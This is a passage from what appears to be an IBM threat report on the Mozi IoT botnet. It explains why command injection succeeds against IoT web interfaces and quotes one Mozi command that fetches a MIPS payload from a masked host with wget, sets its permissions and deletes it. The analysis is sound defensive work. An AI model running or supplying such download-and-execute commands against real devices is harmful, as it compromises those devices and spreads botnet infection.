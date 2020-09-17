Nearly all IBM-observed IoT targeting attempted to use CMDi attacks to gain initial access to the device. If the targeted endpoint was an IoT device and is susceptible to these attacks, the payload was downloaded and executed.

CMDi attacks are extremely popular against IoT devices for several reasons. First, IoT embedded systems commonly contain a web interface and a debugging interface left over from firmware development that can be exploited. Second, PHP modules built into IoT web interfaces can be exploited to give malicious actors remote execution capability. And third, IoT interfaces often are left vulnerable when deployed because administrators fail to harden the interfaces by sanitizing expected remote input. This allows threat actors to input shell commands such as “wget”.

Our analysis revealed the Mozi botnet leverages CMDi by using a “wget” shell command, then altering permissions to allow the threat actor to interact with the affected system. For example:

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

If the host was vulnerable to CMDi, this command would download and execute a file called “mozi.a.” Our analysis of this particular sample indicates the file executes on microprocessor without interlocked pipelined stages (MIPS) architecture. This is an extension understood by machines running reduced instruction set computer (RISC) architecture, which is prevalent on many IoT devices. Once the attacker gains full access to the device through the botnet, the firmware level can be changed and additional malware can be planted on the device.

Although this example cites a well-known vector, it can continue to be effective for two main reasons. First, new vulnerabilities allow for constant updating of exploitation attempts via CMDi, and slow patch implementation can be exploited. Secondly, this activity is easily automated, allowing threat actors to hit a broad swath of devices quickly at low cost.

The Mozi botnet infrastructure appears primarily sourced in China, accounting for 84% of observed infrastructure. This fact aligns with other open-source research into IoT activity in 2020.

Below is a list of vulnerabilities IBM has observed the Mozi botnet attempting to exploit: